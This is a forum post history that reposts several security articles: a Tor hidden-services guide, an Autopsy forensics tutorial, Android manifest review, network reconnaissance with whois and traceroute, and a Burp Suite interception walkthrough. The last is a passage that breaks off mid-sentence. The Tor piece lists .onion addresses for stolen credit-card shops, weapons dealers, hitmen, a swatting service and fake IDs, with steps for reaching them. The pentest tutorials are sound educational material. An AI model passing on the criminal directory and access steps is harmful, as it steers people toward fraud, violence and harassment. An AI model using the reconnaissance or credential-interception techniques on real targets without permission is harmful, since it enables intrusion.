Wubi

Active Members
  • Posts

    893
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by Wubi

  1. Some people think onion routing or the Tor network is for criminals and people with something to hide. Well, they are half right. The Tor network was designed to give a masked, "semi-safe" passage to those who needed to get information out. According to its website, "Tor was originally designed, implemented, and deployed as a third-generation onion routing project of the U.S. Naval Research Laboratory. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others."

People use Tor as a way to bypass traffic filters or monitors throughout the Internet. When combined with at least SSL encryption, this medium has been recognized as a "safer" way to communicate over the Internet. What most people do not realize is that there is an entire underground subnet out there called the "Darknet" or "Deepweb"; others just call it the Tor network's hidden servers. These hidden servers usually have a ".onion" extension and can only be reached using a Tor proxy or TorVPN.

The easiest way to get onto the Tor network is with the Tor Browser Bundle (TBB). It is free and very easy to install and use: go to torproject.org, download TBB, and within minutes you will be connected.

There are legitimate reasons to use Tor, especially for those trying to hide their identities from oppressive government regimes, or for reporters trying to avoid leaking the identities of informants. Some will even stay on the proxy network and use services like Tor Mail, a web-based email service. There are still some anonymity challenges: if you are on the same network, you may still leak the originating IP address, and there is a risk of someone capturing your traffic.
Some will even go as far as only using HTTPS (SSL encryption) or reverting back to the good old VPN.

There are darker usages of the hidden servers. There are e-black markets all over this network that sell anything from meth to machine guns, and services that range from assembling credit card data to assassinations ("you give us a picture; we'll give you an autopsy report!"). Most of the sites trade their goods in Bitcoin, a pseudonymous electronic currency that can purchase almost anything. One of the most popular "secret" sites, "The Silk Road" or SR, has almost anything you can think of. SR has evolved over the years; it recently dropped its weapon sales section and created a new site called the Armory. Shortly after, the Armory closed due to lack of traffic and interest. SR has also banned assassination services to minimize the chances of showing up on law enforcement's radar. It still has plenty of drugs, counterfeit items, and stolen goods, though, and there are plenty of other sites that focus on arms dealing or unfiltered auctions.

Once you are on Tor, the next thing you would do to communicate with some of these sites is get an anonymous Tor-based email. This is a web-based email account that acts just like regular email, except it only exists in the Tor world. Another popular communications mechanism is TorPM.
Tor Communications
- Tor Mail: http://jhiwjjlqpyawmpjx.onion

E-Black Market sites
- The Silk Road: http://silkroadvb5piz3r.onion/index.php
- Black Market Reloaded: http://5onwnspjvuk7cwvk.onion/index.php
- Zanzibar's underground marketplace: http://okx5b2r76olbriil.onion/
- TorBlackmarket: http://7v2i3bwsaj7cjs34.onion/
- EU Weapons & Ammunition: http://4eiruntyxxbgfv7o.onion/snapbbs/2e76676/
- CC4ALL (credit card site): http://qhkt6cqo2dfs2llt.onion/
- CC Paradise: http://mxdcyv6gjs3tvt5u.onion/
- C'thulhu ("organized criminal group"): http://iacgq6y2j2nfudy7.onion/
- Assassination Board: http://4eiruntyxxbgfv7o.onion/
- Another hitman: http://2v3o2fpukdlpk5nf.onion/
- Swattingservice (fake bomb threats): http://jd2iqa4yt7vqvu5o.onion/
- Onion-ID (fake ID): http://g6lfrbqd3krju3ek.onion/
- Quality Counterfeits: http://i3rg5diydpbxkewu.onion/

Social Network
- mul.tiver.se: http://ofrmtr2fphxkqgz3.onion/

Informational
- LiberaTor (weaponry & training): http://p2uekn2yfvlvpzbu.onion/
- The Hidden Wiki: http://kpvz7ki2v5agwt35.onion/wiki/

Search
- Torch: http://xmh57jrzrnw6insl.onion/
- Torlinks: http://torlinkbgs6aabns.onion/

So let's take this step by step:

1. Download the Tor Browser Bundle from torproject.org.
2. Double-click "Start Tor Browser". You should then see Vidalia connecting to Tor.
3. The Tor Browser should open automatically. You are now on the "Deepweb" and can access ".onion" domains.
4. Create a TorMail account at jhiwjjlqpyawmpjx.onion.
5. Create a TorPM account at 4eiruntyxxbgfv7o.onion/pm/
6. Enjoy a little more anonymity for research.

Disclaimer: do NOT break the law. This was written to explain what the Darkweb / Deepnet / Tor hidden services are and what kind of things you may find there. It is not an invitation to break the law with no recourse. Just like any network, this one has both good and bad guys. If you break the law, you will get caught. Bad guys have to be lucky EVERY time. Good guys only have to be lucky once.
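One small thing you can automate when working with lists like the one above: the hidden-service hostnames shown here are v2 onion addresses, which are 16 base32 characters (a-z, 2-7) before the .onion suffix. A minimal Python sketch (the function name is my own) to sanity-check candidate links:

```python
import re

# v2 hidden-service hostnames (the style listed above) are exactly
# 16 base32 characters (a-z, 2-7) followed by ".onion".
V2_ONION = re.compile(r"^[a-z2-7]{16}\.onion$")

def looks_like_v2_onion(hostname: str) -> bool:
    """Return True if hostname matches the v2 .onion hostname format."""
    return bool(V2_ONION.match(hostname.lower()))

print(looks_like_v2_onion("jhiwjjlqpyawmpjx.onion"))  # True
print(looks_like_v2_onion("example.com"))             # False
```

This only checks the shape of the name, not whether the service exists or is reachable.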
Source: InfoSec Institute Resources - The Internet Underground: Tor Hidden Services
  2. Recommended reading:

- Computer Forensics | The Study Material
- First Responder's Guide to Computer Forensics, CERT (search for it on Google)

Introduction

Sometimes out of curiosity you might happen to hack a government computer, and as the adrenaline is pumping, you forget to erase some of the traces you left while making the breach. In short, you are doomed... except if you have a plan B... but never mind... you are doomed. The next step the government will take is disaster control, if you have done something devastating, and also forensic procedures on the crime scene. Just so you know, hacking a computer is illegal; it doesn't matter if it is a government computer or some random person's computer. Hacking with permission is known as penetration testing, where both sides define the rules and the target that should be hacked. So if you want to "play" with forensics, set up a virtual environment where you can try the forensics tools and perform penetration testing, or hack, without violating any rule or law. This article is just a short guide; you cannot learn forensics by reading one short article. It is always better to take a course, read some books, or do some research by yourself. There are thousands of tools and procedures that are implemented differently in every company and country, so in this article I just want to give a simple introduction to forensics and show how to use Autopsy for performing the investigation.

The rules, the crime and what will be examined

So what will be the rules for this article? I will have a straightforward scenario, and it will not be complex at all. I will be using one machine for the attacker and one machine for the victim.

Figure 1. Attack me... I dare you

I will not reveal the whole scenario now, because I want to present the basics of forensics first: what it is all about, why forensics exists, et al.
Through the basics – ohhh... not again!

With the advancement of technology, people have also advanced in their knowledge and skills. Sometimes people do not use their intelligence only for good; sometimes they do bad things like hacking stuff that is not theirs. In short, they want to "own" stuff and have control of certain things, and with that kind of action they give others not just headaches, but back pain too. They want to corrupt, steal, and tamper with data for fun or for some purpose. Those kinds of actions have many motives: hate, propaganda, ego, selfishness, money, etc. Enough of this, let's explain some stuff.

So what is an HDD? In this article I will describe a scenario for performing a forensic analysis on a hard disk, so I will explain this type of storage only. HDD stands for Hard Disk Drive, and like every device this one has a unique architecture and purpose. An HDD is a magnetic data storage device used for storing and retrieving information in digital form (a fuller description is linked in the references).

What is a computer forensic investigation about? From reading about forensics for some time, I concluded that it is the act of collecting evidence with a procedure that preserves the state of the evidence. That means when collecting the evidence, the state of the evidence must not be changed at all... remember that: not at all. If you fail to preserve the state of the evidence you will be in trouble, because there might be, and will be, someone else who expects evidence or who will recheck the case.

Collection of evidence "in action" on a certain computer begins with determining the state of the computer: is it turned on or off? This determines the next steps. If it is turned on, there is information that might be stored in RAM (Random Access Memory), and if we turn it off we might lose that information.
And if it is turned off, the question is: should we start with duplicating the disk? There are many factors. First of all, we don't have any information about what happened. For example, if you have a company that runs a web server, someday it might happen that your server is hacked. If your company has very sensitive information, you have to ask yourself whether it is worth it to chase the guy that hacked your computer (sometimes it turns out your computer was hacked by your own employees) and spend money on a forensic investigation.

The laws for computer forensics will not be described, since I am not from the US, though most of the books and papers that I have read describe the forensic analyses and procedures used in the US. If you want to read more about it:

- http://www.moreilly.com/CISSP/DomA-2-Computer_Crime_investigation.pdf
- http://euro.ecom.cmu.edu/program/law/08-732/Evidence/RyanShpantzer.pdf
- http://www.sans.org/reading_room/whitepapers/incident/computer-forensic-legal-standards-equipment_648
- http://www.novalam.com/files/computer_forensics/Computer%20Forensics%20-%20Law%20and%20Privacy.ppt

In this article, as I mentioned, I will start with analyzing an HDD, and for that scenario I will take the following steps:

- Making a note of the components of the computer (serial number, manufacturer, etc.)
- If the machine is active, proceeding with capturing and cloning the memory; if it is not active, starting with the cloning process of the HDD.
- Saving the image files to a sterile HDD, which helps with preserving the state of the evidence (in this scenario I used my external HDD, formatted so that I can't recover anything from it at all)
- Setting up the tools that will be used
- Reconstructing the crime scene
- Defining evidence (if found) and documenting it
- Seeking the best evidence (something that might be used for solving the case)
- The remaining steps are connected with legal procedures (which I will not explain) about suing, capturing the criminal, etc.

Introduction to the Autopsy Forensic Browser

I think it is better to stop with the theory before I write a whole boring book; let's get to the action. The first thing I will describe is the process of obtaining and cloning the hard disk. Boot a live BackTrack disc to avoid direct access to the hard disk and to avoid any writing to it at all. Start BackTrack and in the terminal run "fdisk -l", which lists all the partitions and hard disks that are currently available. That is displayed in figure 2.

Figure 2. List of storage devices

Now we can see that "/dev/sdb" is my external hard disk and "/dev/sda" is my hard disk, but because I made the scenario, I know that I don't have anything in the second partition, so I will clone only the first partition (/dev/sda2).

Figure 3. Usage of ewfacquire

Now run "ewfacquire /dev/sda2", and with that you must enter some information about the whole case. Here is what I have entered (displayed in figure 4):

Figure 4. Cloning a disk partition

The next step is to wait for the cloning process to finish; the time it takes depends on the size of the partition or hard disk (you know, it makes sense).

Figure 5. I have waited so long that I fell asleep

So now we have the partition in files, whose number may differ depending on the size of the partition/disk. I moved the files to my external hard disk.
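Before going further, it is worth remembering why acquisition tools such as ewfacquire compute a digest of the data: matching digests of the source and the image let you later demonstrate that the evidence was not altered. The idea can be sketched in a few lines of Python; the in-memory buffers below are stand-ins for a real device and its acquired image:

```python
import hashlib

def sha256_of(data: bytes, chunk_size: int = 1 << 20) -> str:
    """Hash data in chunks, the way you would stream a large disk image."""
    h = hashlib.sha256()
    for i in range(0, len(data), chunk_size):
        h.update(data[i:i + chunk_size])
    return h.hexdigest()

# Stand-in for a source partition and its acquired image.
source = b"\x00" * (4 << 20)   # 4 MiB of zeroes
image = bytes(source)          # a faithful clone

# Matching digests support the claim that the evidence was not altered.
print(sha256_of(source) == sha256_of(image))  # True
```

In practice you would hash the block device and the image file, record both digests in the case notes, and re-verify before analysis.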
The result is displayed in figure 6.

Figure 6. Cloned partition

The next thing to do is configure Autopsy for the investigation. Just so you know, Autopsy is a graphical interface to The Sleuth Kit, which is a collection of tools; they can be used on different OS platforms such as Windows and Linux. When starting Autopsy (as you can see from figure 7), you need to configure it by entering the directory that will contain the information about the evidence you will collect.

Figure 7. Configuring Autopsy

After entering the directory, open the link that points to "localhost" to open the user interface of Autopsy.

Figure 8. How Autopsy looks

As you can see, we have three options to choose from: Open Case (if you have previously created one), New Case (if you want to open a new case), and Help (I will not explain what this is for). To create a new case, click the New Case button and something like figure 9 will appear.

Figure 9. Creating a new case

When you create a new case, you need to enter the Case Name, which is like a serial number for the case (you need it as an ID for the current case), then a description of the case (insert here any clue or information you have about the case), and finally the name(s) of the investigator(s). In our scenario I pretend to have no idea what has happened at all.

Figure 10. Case created

The next thing to do is add the host (computer) that will be investigated.
The Host Name is the name of the computer that is going to be investigated; next come the description and notes about the computer (I entered the device description and what is being examined). As for the time zone and the rest of the fields, we do not have any information about the device we are examining, so we leave them empty. (Just so you know: the time zone applies to the files you examine, since sometimes you get a case from a different time zone; the time skew is where you manually adjust how many seconds the computer was out of synchronization; and the path of the alert hash database is an optional database of hashes for files that are marked as bad.)

Figure 11. Adding the host

When you have created the case and added the host, you will see a menu of options (figure 12), where you need to add the images from the cloned hard disk for analysis.

Figure 12. The case

Figure 13. Adding the images

Add the images with "CS221.*" and define the type of image. The choice depends on what kind of image you have created (a partition image or a disk image). In my scenario I have created a partition image (volume image).

Figure 14. Defining the type of image

Figure 15. Last step... case set for investigation

This is the last step of this article; wait for the next part, where I will describe the features that follow when adding the images and the details of the investigation.

Conclusion

As I said, this is not the only way of solving a crime. There are thousands of tools you can use to find more and more clues that will help you solve the case and capture the villain.
This may not be the best article you have read about forensics, but I have to adjust it so everyone can understand it, and to explain that forensics is a very important part of our digital society. Today there are a lot of people who might be a threat to your business, and if you are a serious competitor it's not a bad idea to have an incident response team that also has the skills of a forensic investigator, because someday they might save your head... I am just kidding, but I want to tell you that your computers and company will not always be 100% protected, so if plan B fails, always have a plan C, just in case; you never know when you are going to use it.

References

- Clone a Hard Drive Using an Ubuntu Live CD – How-To Geek
- Cloning a drive the 'dd' way | Tanner's Website
- Derek Newton – Recycle Bin Forensics in Windows 7 and Vista
- Master File Table (MFT)
- What is IT forensics? | IT & Computer forensics beginner's guide
- Free IT forensic software | Free computer forensic software tools
- Python forensics tools
- How many bytes in a sector? – Where is Your Data?
- What Is the NTUSER.DAT File? | eHow.com
- Hard disk drive – Wikipedia, the free encyclopedia
- Forensic Examinations Series

Source: InfoSec Institute Resources - Investigating the Crime Scene, Part 1: A Brief Introduction to Computer Forensics and Autopsy
  3. By the end of 2012, the number of smartphone shipments around the world will explode to nearly 668 million units, and the Android operating system will have a fifty percent market share. This also means an increase in the number of attacks on mobile applications, and in the investment in securing applications against those attacks. The most important part of performing an application pentest for an Android application is understanding the manifest configuration. Analyzing the manifest file is one of the most important and tedious tasks while performing a penetration testing assessment on the world's most popular mobile OS.

Android is a privilege-separated operating system, in which each application runs with a distinct system identity. At install time, Android gives each package a distinct Linux user ID. The identity remains constant for the duration of the package's life on that device. On a different device, the same package may have a different UID; what matters is that each package has a distinct UID on a given device.

Every Android application must have an AndroidManifest.xml file in its root directory. The manifest presents essential information about the application to the Android system, information the system must have before it can run any of the application's code. High-level permissions restricting access to entire components of the system or application can be applied through the AndroidManifest.xml. The manifest file does the following:

- It describes the components (the activities, services, broadcast receivers, and content providers) that the application is composed of. These declarations let the Android system know what the components are and under what conditions they can be launched.
- It determines which processes will host application components.
- It declares which permissions the application must have in order to access protected parts of the API and interact with other applications.
- It also declares the permissions that others are required to have in order to interact with the application's components.
- It declares the minimum level of the Android API that the application requires.
- It lists the libraries that the application must be linked against.
- It names the Java package for the application; the package name serves as a unique identifier for the application.

The AndroidManifest.xml file plays a very important role in analyzing the security of Android mobile applications. The file is of great interest when analyzing system security because it defines the permissions the system and applications enforce. Android packages are .apk files. For test purposes you can download any Android application and extract it, and you will see the AndroidManifest.xml file, which is difficult to open in its raw form. (See figure 1.0: AndroidManifest.xml natively obfuscated.) Here is the step-by-step methodology to open and review it:

1. Download the following tools: apktool-install-windows-file, apktool-file.
2. Unpack both to your Windows directory.
3. Copy the APK file into that directory and run the following command in your command prompt (see figure 1.1: Decoding apk application file), where app.apk is your Android APK file:

apktool d app.apk ./app_decrypted

4. This creates a folder "app_decrypted" in your current directory. Inside it you can find the AndroidManifest.xml file in decoded form; you can also find other XML files inside the "app_decrypted/res/layout" directory.

The manifest contains juicy information like permissions, intent filters, and lots more.
A typical manifest file is shown below (figure 1.2: Example of AndroidManifest.xml).

Some of the important configuration settings to look for while analyzing a manifest file:

android:installLocation
What to check: if it is set to "auto", the application may be installed on external storage, although the system installs it on internal storage by default. If the internal storage is full, the system will install it on external storage; once installed, the user can move the application to either internal or external storage through the system settings.
Recommendation: use the "internalOnly" value for this setting.

android:protectionLevel
What to check: characterizes the potential risk implied in the permission and indicates the procedure the system should follow when determining whether or not to grant the permission to an application requesting it.
Recommendation: check if the value is set to "normal" or "dangerous". If it is set to "dangerous", review the permissions.

android:persistent
What to check: whether or not the application should remain running at all times: "true" if it should, "false" if not. The default value is "false".
Recommendation: applications should not normally set this flag; it should be set to "false".

android:restoreAnyVersion
What to check: indicates that the application is prepared to attempt a restore of any backed-up data set, even if the backup was stored by a newer version of the application than is currently installed on the device. Setting this attribute to "true" permits the Backup Manager to attempt a restore even when a version mismatch suggests that the data are incompatible.

Analyzing the manifest file thoroughly can help a penetration tester plan and execute other attacks. After it is done successfully, the remaining testing boils down to a normal web application pentest.
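Checks like the ones listed above are easy to script against the decoded manifest. Below is a rough Python sketch, not a complete auditing tool; the sample manifest and the wording of the findings are my own:

```python
import xml.etree.ElementTree as ET

ANDROID = "http://schemas.android.com/apk/res/android"

# A trimmed sample of a decoded manifest (apktool output is plain XML).
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    android:installLocation="auto" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:persistent="true"/>
</manifest>"""

def review(manifest_xml: str) -> list:
    """Flag the manifest settings discussed above. Illustrative only."""
    root = ET.fromstring(manifest_xml)
    findings = []
    if root.get(f"{{{ANDROID}}}installLocation") != "internalOnly":
        findings.append("installLocation is not 'internalOnly'")
    app = root.find("application")
    if app is not None and app.get(f"{{{ANDROID}}}persistent") == "true":
        findings.append("persistent is 'true'")
    perms = [p.get(f"{{{ANDROID}}}name") for p in root.iter("uses-permission")]
    findings.extend(f"requests {p}" for p in perms)
    return findings

for finding in review(SAMPLE):
    print(finding)
```

A real check would also look at exported components, intent filters, and protectionLevel on custom permissions, but the pattern is the same: parse once, then assert on attributes.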
So next time you download an application from the Android market, just take a while to open and analyze the AndroidManifest.xml file for fun.

Source: InfoSec Institute Resources - Inside Android Applications
  4. 1. Introduction

Whenever we're doing a penetration test, it's good to figure out the topology of the network we're testing. We can't figure out the whole topology, because we don't have access to the internal network, but even figuring out part of it is pretty useful. To do that, we must have a good understanding of the technology that is usually deployed, so we need at least a basic understanding of the following topics: switches, routers, IDS/IPSs, firewalls, VPNs, DMZs, VLANs, etc. This isn't such a small requirement. First we must describe what all of those things are. For those of you who already know at least something about these topics, it will just be a quick refresher, but if you've never encountered them, you should probably read more comprehensive material.

2. Networking Internals

Switch: A network switch or switching hub is a computer networking device that connects network segments or network devices [1]. We should remember that a network switch operates at layer 2 of the OSI model (some switches are also layer 3 aware, but let's forget that for now). You should take a look at Cisco switches, as they are quite popular in larger networks.

Router: A router is a device that forwards data packets between computer networks, creating an overlay internetwork. A router is connected to two or more data lines from different networks. When a data packet comes in on one of the lines, the router reads the address information in the packet to determine its ultimate destination. Then, using information in its routing table or routing policy, it directs the packet to the next network on its journey. Routers perform the "traffic directing" functions on the Internet [2]. The router operates at layer 3 of the OSI model, which means it is capable of doing NAT (network address translation), translating WAN IPs into LAN IPs so that packets can be routed through the internal network.
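The NAT idea just mentioned can be illustrated with a toy translation table. This is only a sketch under simplifying assumptions (port-based translation only, a hypothetical public address, no protocol tracking or timeouts):

```python
# A toy NAT table: outbound LAN flows are rewritten to the router's
# WAN address, and replies are mapped back to the originating host.

WAN_IP = "203.0.113.1"  # hypothetical public address

class NatTable:
    def __init__(self):
        self._next_port = 40000
        self._out = {}   # (lan_ip, lan_port) -> wan_port
        self._in = {}    # wan_port -> (lan_ip, lan_port)

    def outbound(self, lan_ip: str, lan_port: int):
        """Translate a LAN source to the router's WAN address and port."""
        key = (lan_ip, lan_port)
        if key not in self._out:
            self._out[key] = self._next_port
            self._in[self._next_port] = key
            self._next_port += 1
        return WAN_IP, self._out[key]

    def inbound(self, wan_port: int):
        """Map a reply arriving on the WAN side back to the LAN host."""
        return self._in.get(wan_port)

nat = NatTable()
print(nat.outbound("192.168.1.10", 51515))  # ('203.0.113.1', 40000)
print(nat.inbound(40000))                   # ('192.168.1.10', 51515)
```

Real routers keep far more state per flow, but the core mapping is exactly this table.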
IDS: An intrusion detection system can be software-based or hardware-based and is used to monitor network packets or systems for malicious activity and take a specific action if such activity is detected. Usually, if malicious activity is detected on the network, the source IP of the malicious traffic is blocked for a certain period of time, and all of the packets from that IP address will be rejected. More about this can be read here: InfoSec Institute Resources – Packet Filtering.

IPS: The intrusion prevention system is basically an upgrade of the intrusion detection system. Where the IDS is used to detect and log the attack, the IPS is used to detect, block, and log the attack. IPS systems are able to prevent certain attacks while they are happening. There are multiple types of IPS systems, but we won't describe them in detail, since they parallel the IDS types, with the exception that all of the types of IPS system also prevent the attack from continuing. The types of IPS systems are: NIPS, HIPS, WIPS, NBA. More about this can be read here: InfoSec Institute Resources – Packet Filtering.

Firewall: A firewall can be either software-based or hardware-based and is used to help keep a network secure. Its primary objective is to control the incoming and outgoing network traffic by analyzing the data packets and determining whether they should be allowed through or not, based on a predetermined rule set. A network's firewall builds a bridge between an internal network that is assumed to be secure and trusted and another network, usually an external (inter)network such as the Internet, that is not assumed to be secure and trusted. More about this can be read here: InfoSec Institute Resources – Packet Filtering.

VPN: A virtual private network (VPN) is a technology for using the Internet or another intermediate network to connect computers to isolated remote computer networks that would otherwise be inaccessible.
A VPN provides security so that traffic sent through the VPN connection stays isolated from other computers on the intermediate network. VPNs can connect individual users to a remote network or connect multiple networks together [3]. When a company's network is very big, not all of the hardware can usually be located in the same geographical place, yet those devices should nevertheless be part of the same network. So even if those network devices are connected to the Internet half a world away through a different ISP, they still need to be part of the same network. Let's take a simple example: if a company deals in computer hardware sales, it probably has shops all around the country, and even in multiple countries. To keep those devices part of the same network even though their Internet access comes from different ISPs, VPNs are used. Thus, through VPNs, users are able to access remote resources as if they were part of the same local network.

DMZ: A DMZ is a physical or logical subnetwork that contains and exposes an organization's external-facing services to a larger untrusted network, usually the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN); an external attacker only has access to equipment in the DMZ, rather than any other part of the network [4]. We put only the servers that should be accessible from the world wide web into the DMZ. Thus, access to the servers in the DMZ will be allowed, but any other servers that are part of the same network but not in the DMZ will be hidden. The servers in the DMZ also don't have access to the rest of the internal network, so even if a breach happens, the attacker will only be able to compromise the servers in the DMZ itself.

VLAN: A VLAN is a concept of partitioning a physical network so that distinct broadcast domains are created.
This is usually achieved on switch or router devices. Grouping hosts with a common set of requirements, regardless of their physical location, into a VLAN can greatly simplify network design. A VLAN has the same attributes as a physical local area network (LAN), but it allows end stations to be grouped together more easily even if they are not on the same network switch [5]. VLANs can be used to set up a virtual LAN where we don't have to physically relocate the devices, which is really good in virtualized environments. And let's face it, almost every company today uses a virtualized networking setup.

3. Presenting a Network Topology

Here we'll present a common network topology, which can be seen in the picture below. I would like feedback on the picture presented: if you use a different topology, please write a sentence or two about it so we can gather knowledge about different setups. I think various start-up companies can gain from that, because we can present a picture of different topologies, giving them different options to choose from based on their requirements. The topology below presents the way I see the network should be organized for a middle-sized company that uses a /24 IP range.

We can see the network topology of a company with a /24 IP range. At the entry point of the network there is a gateway, followed by an IDS/IPS system and a firewall; those are there to block known malicious attacks on the systems in the internal network. After that we can see the SRV demilitarized zone, which holds all the servers that should be accessible to the outside world. There are also various local networks (LANs), where VLANs can be in use (common if hardware virtualization is in place). And let's not forget about the VPNs that can be present if the network is dispersed across multiple geographical locations.

4. Identify Network Topology: Simple Example

When identifying the network topology of a company, we first need to determine its IP range.
To identify the IP range of the Gentoo Linux foundation, we can use the nslookup and whois tools as follows:

# nslookup gentoo.org
Server: 84.255.209.79
Address: 84.255.209.79#53

Non-authoritative answer:
Name: gentoo.org
Address: 89.16.167.134

# whois 89.16.167.134
% Information related to '89.16.167.128 - 89.16.167.143'

inetnum: 89.16.167.128 - 89.16.167.143
status: ASSIGNED PA
tech-c: BYT2-RIPE
descr: Gentoo Linux (www.gentoo.org)
netname: BYTEMARK-GENTOOLINUX
country: GB
admin-c: BYT2-RIPE
source: RIPE # Filtered
mnt-by: MNT-BYTEMARK

We can see that Gentoo Linux has an IP range of 89.16.167.128 - 89.16.167.143, which can be represented with the CIDR 89.16.167.128/28. This can be calculated by hand or with an online tool. We can also see that Gentoo Linux is hosted at www.bytemark.co.uk, which we need to investigate further. To identify the ASN of the Bytemark hosting company, we can execute the whois command below:

# whois -h whois.cymru.com 89.16.167.134
AS | IP | AS Name
35425 | 89.16.167.134 | BYTEMARK-AS Bytemark Computer Consulting Ltd

Cool, the ASN of "BYTEMARK-AS Bytemark Computer Consulting Ltd" is 35425. But we want to go further; we need to find out all the IP ranges that are under Bytemark's jurisdiction.
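As an aside, the range-to-CIDR conversion mentioned above can also be done locally with Python's standard ipaddress module, instead of an online tool:

```python
import ipaddress

# The whois output gave the range 89.16.167.128 - 89.16.167.143.
first = ipaddress.IPv4Address("89.16.167.128")
last = ipaddress.IPv4Address("89.16.167.143")

# summarize_address_range yields the CIDR blocks covering the range.
cidrs = list(ipaddress.summarize_address_range(first, last))
print(cidrs)  # [IPv4Network('89.16.167.128/28')]

# And the host from nslookup falls inside it:
print(ipaddress.IPv4Address("89.16.167.134") in cidrs[0])  # True
```

A 16-address range aligned at .128 collapses to a single /28, which matches the CIDR above.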
We can again do this with the whois command like this:

# whois -h whois.ripe.net -i origin -T route AS35425 | grep -w "route:" | awk '{print $NF}' | sort -n
5.153.224.0/21
46.43.0.0/18
46.43.35.0/24
80.68.80.0/20
80.68.80.0/21
80.68.88.0/21
89.16.160.0/19
91.223.58.0/24
212.110.160.0/19
212.110.177.0/24
213.138.96.0/19

Notice that we used the AS35425 number we learned in the previous step. Okay, so the Gentoo Linux IP range falls within the 89.16.160.0/19 prefix. The next thing is to traceroute the IP of the Gentoo Linux domain from different locations to find out the entry points. The results of a traceroute run from an online tool (Free online network tools - traceroute, nslookup, dig, whois lookup, ping - IPv6) are presented below. We can see that the first node in the Bytemark hosting company is 91.223.58.79, which has direct access to the 89.16.167.134 address that belongs to Gentoo. This is logical: since Gentoo Linux doesn't have its own autonomous system (AS), Bytemark should have direct access to its own hosts. Let's try to run a few more traceroutes from different locations. The results of a traceroute from another web site (Traceroute, Ping, Domain Name Server (DNS) Lookup, WHOIS) are presented below. We can see the same results as above: the connection to 89.16.167.134 goes through 91.223.58.79. If we ran the traceroute from a few more locations we might get a different result, because the packets would be routed through a different Bytemark router with a different IP. The Gentoo Linux topology really isn't that complicated, because they don't have their own ASN. And their hosting provider Bytemark really shouldn't have a filter or IDS/IPS system in place, because it's the job of the end customer to apply those. 
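Matching Gentoo's address against Bytemark's announced prefixes can also be scripted instead of eyeballed. A small sketch using Python's stdlib; the prefix list below is a subset of the whois route output above:

```python
# Find which of the AS's announced prefixes contains a given address.
import ipaddress

routes = ["5.153.224.0/21", "46.43.0.0/18", "80.68.80.0/20",
          "89.16.160.0/19", "91.223.58.0/24", "212.110.160.0/19"]
ip = ipaddress.ip_address("89.16.167.134")

matches = [r for r in routes if ip in ipaddress.ip_network(r)]
print(matches)  # ['89.16.160.0/19']
```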
If the hosting provider filtered the packets destined for the end IP address (whatever services they are running: http, ssh, ftp, etc.), they would need to inspect the packets themselves and accept/deny them, which can cause a lot of problems. For example, let's say I'm connecting to www.gentoo.org, but Bytemark's hosting filter decides that it will not let my packets through (for whatever reason). Can you see the problem there? It's not Bytemark's decision what packets go to Gentoo's website, and they shouldn't decide whether to allow/block the connections. 5. Conclusion We've seen how we can get a basic topology of a really simple company, but often the task is not that simple, because there are multiple filters and IDS/IPS systems in place that can block our requests. Usually the traceroute itself doesn't print all the hosts on the way to the target, because when a packet enters the customer's network, it can be checked, filtered or even blocked. References: [1] Network switch, Wikipedia, accessible at http://en.wikipedia.org/wiki/Network_switch. [2] Router (computing), Wikipedia, accessible at http://en.wikipedia.org/wiki/Router_(computing). [3] Virtual private network, Wikipedia, accessible at http://en.wikipedia.org/wiki/Virtual_private_network. [4] DMZ (computing), Wikipedia, accessible at http://en.wikipedia.org/wiki/DMZ_(computing). [5] Virtual LAN, Wikipedia, accessible at http://en.wikipedia.org/wiki/Virtual_LAN. Sursa InfoSec Institute Resources - Network Topology
5. In this article, we are going to see another powerful framework that is widely used in pen-testing. Burp suite is an integration of various tools that work together effectively to help the pen-tester through the entire testing process, from the mapping phase to identifying vulnerabilities and exploiting them. In the figure above, we see the various features of this tool: proxy, spider, intruder, repeater, sequencer, decoder and comparer. As we move ahead in the tutorial, we shall learn how to make use of them seamlessly. Burp-Proxy This lets you intercept the traffic between the browser and the target application. This option works like a man-in-the-middle attack vector. Below I shall show you one of my favorite examples demonstrating this feature. Here, we are looking at a Wikipedia login form (dummyuser:dummypassword) and we shall see how the intercept works. Initially we need to switch the intercept mode ON in the suite. The FORWARD option allows you to send the packets coming from the source IP to the destination IP. The DROP option allows you to drop a packet if you feel it's not a packet that needs analysis. In this figure, we see that the login credentials of en.wikipedia.org are being captured. The point to note here is that Wikipedia uses HTTP instead of HTTPS, and thus the login credentials are captured in clear text. The Burp proxy listener is enabled on port 8080 of the local host. There are various options for intercept set-up, like request methods, matching file extensions, and URL scope for the client requests. Other options like request type, content types, and URL scope in the server responses can be set up based on the attack scenario. I have used Mozilla Firefox here; the same holds for any other browser. Many steps can follow from this phase. The capture can be dropped, or sent to the spider, sequencer, comparer, etc. There is an option of changing the request method from GET to POST and so on. 
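To see why the proxy can read the login in clear text, consider the raw request a browser emits over plain HTTP. A hypothetical sketch (the form field names and path below are made up for illustration, not necessarily the site's real ones); anything sitting on the wire path, such as a proxy listening on port 8080, sees these bytes verbatim:

```python
# Build the kind of raw POST request a browser would emit over plain
# HTTP. Field names and path are illustrative only.
from urllib.parse import urlencode

body = urlencode({"username": "dummyuser", "password": "dummypassword"})
raw_request = (
    "POST /login HTTP/1.1\r\n"
    "Host: en.wikipedia.org\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(body)}\r\n"
    "\r\n" + body
)
# Without TLS there is no encryption step: the password is right there.
print(raw_request)
```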
Burp-site Map and Site Scope In this section, we look at Burp site maps and site scopes. This section shows us the various sections of a particular domain. Here, we can choose the scope of our security testing. We see a huge number of subdomains when we visit www.google.com. The figure shows the site-map and site scope. We can also see that visited pages are darkened, while unvisited pages are grayed. This particular instance in the screenshot shows the searches that were done by the user. I have searched for "Security research", and using the keyword finder, I have highlighted the word "security". The figure to the left shows the site-map of Google. Google is just used here for a demo; the target web application can be anything under analysis. Burp Spider The spider tool is used to get a complete list of URLs and parameters for each site. The tool looks into each page that was manually visited and goes through every link it finds within the testing scope. Make sure that your proxy interception is switched off when using the spider tool. The more links you manually visit, the better spidering results you are going to get; it simply gives the spider a larger coverage area. Setting up the spider is done using the options menu. The two main things we need to set are the authentication and the thread count. The authentication field can be set with a username and password combination. The reason we set this up is that when the spider comes across a login page, it can go through the authentication process in an 